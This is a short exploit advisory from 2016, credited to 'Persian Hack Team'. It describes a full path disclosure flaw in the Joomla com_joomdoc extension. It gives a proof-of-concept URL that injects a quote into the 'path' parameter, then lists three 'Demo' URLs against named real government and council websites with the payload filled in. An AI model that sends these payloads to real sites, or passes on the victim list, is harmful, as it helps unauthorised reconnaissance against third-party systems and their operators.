###################### # Exploit Title : Joomla com_joomdoc - Full Path Disclosure Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/joomdoc # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.0.3 # Date: 2016/06/08 ###################### # # PoC: # Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. # index.php?option=com_joomdoc&view=documents&path=['] # Demo : # http://www.webster-ma.gov/index.php?option=com_joomdoc&view=documents&path=%27Agendas/Board+Of+Fire+Engineers&Itemid=735 # http://www.bpp.gov.ng/index.php?option=com_joomdoc&view=documents&path=%27Certificates+of+No+Objection+Jan-October+2013.pdf # http://www.nursingcouncil.org.jm/index.php?option=com_joomdoc&view=documents&path=%27Application%20Forms&Itemid=62 ###################### # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir ######################